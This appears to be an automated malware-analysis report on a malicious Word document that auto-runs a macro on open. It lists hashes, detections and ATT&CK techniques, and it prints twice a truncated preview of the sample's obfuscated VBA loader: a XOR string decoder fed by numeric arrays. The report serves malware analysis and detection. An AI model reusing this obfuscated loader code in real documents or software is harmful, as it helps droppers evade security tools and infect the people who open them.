Office (OLE) malware analysis — malicious · 0e18e973884f6055

MALICIOUS

Office (OLE)

451.5 KB Created: 2016-12-15 16:43:00 Authoring application: Microsoft Office Word First seen: 2017-12-24

MD5: 09221f6f9dfba7e1b6122955e17b1d76 SHA-1: af46e84d43a6a567e911d252c39befb7a61b7efd SHA-256: 0e18e973884f60558fe2f9749919d08aa1f11b52cc45682bfe02cdbaa9481362

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing obfuscated VBA macros, specifically an auto-exec loader triggered by the Document_Open event. The document body contains a lure instructing the user to enable content, a common tactic for macro-based malware. The VBA code reconstructs a string which is likely a URL or command to download and execute a second-stage payload, although the full string could not be reconstructed due to truncation.

Heuristics 8

ClamAV: Doc.Dropper.Agent-6355239-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6355239-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://office365.com/ In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8516 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8516 bytes
SHA-256: `8f761b76b7aa7b6ffd87df104b03b5fd0da2eb6858c0bcd3b5b0e89241e6db1d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function EKPGgsSIQS(XgROlhVrtU As Variant, DYClKqmEoB As Integer) Dim Eejspqclxn, MEplvGhBjh As String, WVgSgnugxN, PMOdYYtHBL MEplvGhBjh = ActiveDocument.Variables("zaxwoO").Value() Eejspqclxn = "" WVgSgnugxN = 1 While WVgSgnugxN < UBound(XgROlhVrtU) + 2 PMOdYYtHBL = WVgSgnugxN Mod Len(MEplvGhBjh): If PMOdYYtHBL = 0 Then PMOdYYtHBL = Len(MEplvGhBjh) Eejspqclxn = Eejspqclxn + Chr(Asc(Mid(MEplvGhBjh, PMOdYYtHBL + DYClKqmEoB, 1)) Xor CInt(XgROlhVrtU(WVgSgnugxN - 1))) WVgSgnugxN = WVgSgnugxN + 1 Wend EKPGgsSIQS = Eejspqclxn End Function Public Function ohTTCzBICY() As Variant Dim kLADVHDUJYxPtdf As String kLADVHDUJYxPtdf = EKPGgsSIQS(Array(8, 28, 33, 33), 1243) kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(66, 10, 48, 53, 57, 21, 75, 8, 65, 50, 111, 93, 29, 43, 57, 19, 107, 119, 93, 12, 120, _ 111, 111, 1, 103, 30, 43, 62, 80, 9, 10, 108, 87, 42, 61, 83, 122, 24, 12, 52, 33, _ 119, 28, 0, 42, 101), 1247) kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(30, 26, 53, 34, 1, 7, 49, 55, 63, 40, 65, 27, 45, 110, 37, 52, 17, 4, 26, 119, 30, _ 52, 18, 61, 6, 19, 22, 6, 36, 19, 22, 52, 63, 42, 71, 50, 60, 121, 50, 41, 24, _ 0, 33, 48, 54, 101, 35, 57, 23, 53), 150) kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(123, 39, 28, 58, 0, 15, 43, 15, 37, 57, 40, 18, 47, 4, 57, 48, 2, 35, 46, 123, 11, _ 36, 5, 50, 7, 22, 38, 30, 38, 25, 36, 46, 64, 7, 125, 31, 41, 57, 2, 43, 7, _ 5, 19, 7, 48, 62, 20, 0, 122, 45), 50) kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(20, 8, 32, 20, 86, 44, 21, 25, 37, 29, 38, 48, 7, 24, 5, 27, 10, 90, 20, 47, 8, _ 41, 57, 47, 7, 51, 23, 37, 54, 57, 34, 8, 3, 18, 120, 8, 37, 14, 36, 4, 19, _ 96, 12, 85, 69, 47, 85, 7, 61, 4), 971) kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(44, 49, 22, 21, 28, 32, 13, 58, 59, 47, 35, 0, 116, 45, 6, 121, 5, 117, 16, 22, 7, _ 34, 41, 38, 19, 16, 26, 113, 57, 119, 62, 80, 7, 36, 17, 15, 4, 48, 11, 10, 18, _ 25, 5, 116, 99, 39, 24, 33, 54, 21), 0) kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(11, 52, 44, 22, 114, 23, 112, 51, 1, 24, 90, 40, 18, 117, 12, 3, 46, 118, 45, 20, 21, _ 112, 22, 118, 61, 49, 21, 17, 13, 45, 45, 84, 35, 27, 110, 15, 35, 47, 22, 58, 101, _ 3, 47, 121, 61, 35, 23, 9, 63, 15), 475) kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(32, 53, 43, 70, 44, 40, 59, 51, 1, 47, 3, 37, 57, 46, 114, 22, 5, 44, 46, 97, 45, _ 96, 26, 18, 62, 117, 38, 66, 116, 7, 47, 15, 88, 16, 42, 4, 44, 5, 47, 24, 12, _ 116, 21, 65, 55, 56, 54, 38, 13, 13), 726) kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(45, 38, 22, 106, 15, 41, 53, 47, 33, 33, 2, 5, 33, 34, 17, 42, 21, 46, 27, 48, 120, _ 11, 61, 18, 16, 63, 14, 5, 64, 8, 6, 3, 1, 4, 48, 105, 20, 3, 75, 121, 25, _ 94, 47, 23, 7, 39, 90, 17, 40, 2), 1182) kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(18, 3, 86, 42, 97, 47, 115, 86, 32, 11, 52, 53, 24, 5, 18, 97, 113, 57, 54, 56, 82, _ 5, 57, 32, 53, 22, 66, 55, 43, 0, 9, 69, 120, 48, 59, 14, 99, 18, 113, 109, 41, _ 44, 115, 48, 124, 23, 40, 113, 119, 104), 921) kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(56, 121, 10, 9, 43, 50, 16, 15, 0, 47, 41, 14, 55, 8, 41, 33, 6, 53, 84, 24, 112, _ 100, 112, 58, 2, 20, 0, 35, 28, 58, 49, 85, 44, 21, 69, 16, 5, 10, 7, 59, 6, _ 12, 49, 19, 34, 13, 16, 105, 101, 45), 626) kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(23, 48, 17, 6, 50, 16, 8, 47, 53, 59, 10, 37, 42, 40, 24, 44, 94, 3, 1, 6, 54, _ 101, 35, 15, 37, 7, 13, 58, 119, 108, 22, 4, 92, 120, 6, 49, 12, 63, 54, 19, 31, _ 36, 4, 30, 22, 19, 33, 48, 62, 36), 300) kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(49, 37, 9, 28, 60, 46, 9, 54, 122, 51, 16, 38, 54, 38, 24, 0, 114, 34, 41, 31, 34, _ 118, 1, 5, 21, 24, 49, 45, 29, 59, 57, 116, 9, 19, 117, 103, 55, 5, 50, 114, 36, _ 39, 48, 9 ... (truncated)

SHA-256: 8f761b76b7aa7b6ffd87df104b03b5fd0da2eb6858c0bcd3b5b0e89241e6db1d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function EKPGgsSIQS(XgROlhVrtU As Variant, DYClKqmEoB As Integer)
Dim Eejspqclxn, MEplvGhBjh As String, WVgSgnugxN, PMOdYYtHBL
MEplvGhBjh = ActiveDocument.Variables("zaxwoO").Value()
Eejspqclxn = ""
WVgSgnugxN = 1
While WVgSgnugxN < UBound(XgROlhVrtU) + 2
PMOdYYtHBL = WVgSgnugxN Mod Len(MEplvGhBjh): If PMOdYYtHBL = 0 Then PMOdYYtHBL = Len(MEplvGhBjh)
Eejspqclxn = Eejspqclxn + Chr(Asc(Mid(MEplvGhBjh, PMOdYYtHBL + DYClKqmEoB, 1)) Xor CInt(XgROlhVrtU(WVgSgnugxN - 1)))
WVgSgnugxN = WVgSgnugxN + 1
Wend
EKPGgsSIQS = Eejspqclxn
End Function
Public Function ohTTCzBICY() As Variant
Dim kLADVHDUJYxPtdf As String
kLADVHDUJYxPtdf = EKPGgsSIQS(Array(8, 28, 33, 33), 1243)
kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(66, 10, 48, 53, 57, 21, 75, 8, 65, 50, 111, 93, 29, 43, 57, 19, 107, 119, 93, 12, 120, _
111, 111, 1, 103, 30, 43, 62, 80, 9, 10, 108, 87, 42, 61, 83, 122, 24, 12, 52, 33, _
119, 28, 0, 42, 101), 1247)
kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(30, 26, 53, 34, 1, 7, 49, 55, 63, 40, 65, 27, 45, 110, 37, 52, 17, 4, 26, 119, 30, _
52, 18, 61, 6, 19, 22, 6, 36, 19, 22, 52, 63, 42, 71, 50, 60, 121, 50, 41, 24, _
0, 33, 48, 54, 101, 35, 57, 23, 53), 150)
kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(123, 39, 28, 58, 0, 15, 43, 15, 37, 57, 40, 18, 47, 4, 57, 48, 2, 35, 46, 123, 11, _
36, 5, 50, 7, 22, 38, 30, 38, 25, 36, 46, 64, 7, 125, 31, 41, 57, 2, 43, 7, _
5, 19, 7, 48, 62, 20, 0, 122, 45), 50)
kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(20, 8, 32, 20, 86, 44, 21, 25, 37, 29, 38, 48, 7, 24, 5, 27, 10, 90, 20, 47, 8, _
41, 57, 47, 7, 51, 23, 37, 54, 57, 34, 8, 3, 18, 120, 8, 37, 14, 36, 4, 19, _
96, 12, 85, 69, 47, 85, 7, 61, 4), 971)
kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(44, 49, 22, 21, 28, 32, 13, 58, 59, 47, 35, 0, 116, 45, 6, 121, 5, 117, 16, 22, 7, _
34, 41, 38, 19, 16, 26, 113, 57, 119, 62, 80, 7, 36, 17, 15, 4, 48, 11, 10, 18, _
25, 5, 116, 99, 39, 24, 33, 54, 21), 0)
kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(11, 52, 44, 22, 114, 23, 112, 51, 1, 24, 90, 40, 18, 117, 12, 3, 46, 118, 45, 20, 21, _
112, 22, 118, 61, 49, 21, 17, 13, 45, 45, 84, 35, 27, 110, 15, 35, 47, 22, 58, 101, _
3, 47, 121, 61, 35, 23, 9, 63, 15), 475)
kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(32, 53, 43, 70, 44, 40, 59, 51, 1, 47, 3, 37, 57, 46, 114, 22, 5, 44, 46, 97, 45, _
96, 26, 18, 62, 117, 38, 66, 116, 7, 47, 15, 88, 16, 42, 4, 44, 5, 47, 24, 12, _
116, 21, 65, 55, 56, 54, 38, 13, 13), 726)
kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(45, 38, 22, 106, 15, 41, 53, 47, 33, 33, 2, 5, 33, 34, 17, 42, 21, 46, 27, 48, 120, _
11, 61, 18, 16, 63, 14, 5, 64, 8, 6, 3, 1, 4, 48, 105, 20, 3, 75, 121, 25, _
94, 47, 23, 7, 39, 90, 17, 40, 2), 1182)
kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(18, 3, 86, 42, 97, 47, 115, 86, 32, 11, 52, 53, 24, 5, 18, 97, 113, 57, 54, 56, 82, _
5, 57, 32, 53, 22, 66, 55, 43, 0, 9, 69, 120, 48, 59, 14, 99, 18, 113, 109, 41, _
44, 115, 48, 124, 23, 40, 113, 119, 104), 921)
kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(56, 121, 10, 9, 43, 50, 16, 15, 0, 47, 41, 14, 55, 8, 41, 33, 6, 53, 84, 24, 112, _
100, 112, 58, 2, 20, 0, 35, 28, 58, 49, 85, 44, 21, 69, 16, 5, 10, 7, 59, 6, _
12, 49, 19, 34, 13, 16, 105, 101, 45), 626)
kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(23, 48, 17, 6, 50, 16, 8, 47, 53, 59, 10, 37, 42, 40, 24, 44, 94, 3, 1, 6, 54, _
101, 35, 15, 37, 7, 13, 58, 119, 108, 22, 4, 92, 120, 6, 49, 12, 63, 54, 19, 31, _
36, 4, 30, 22, 19, 33, 48, 62, 36), 300)
kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(49, 37, 9, 28, 60, 46, 9, 54, 122, 51, 16, 38, 54, 38, 24, 0, 114, 34, 41, 31, 34, _
118, 1, 5, 21, 24, 49, 45, 29, 59, 57, 116, 9, 19, 117, 103, 55, 5, 50, 114, 36, _
39, 48, 9
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.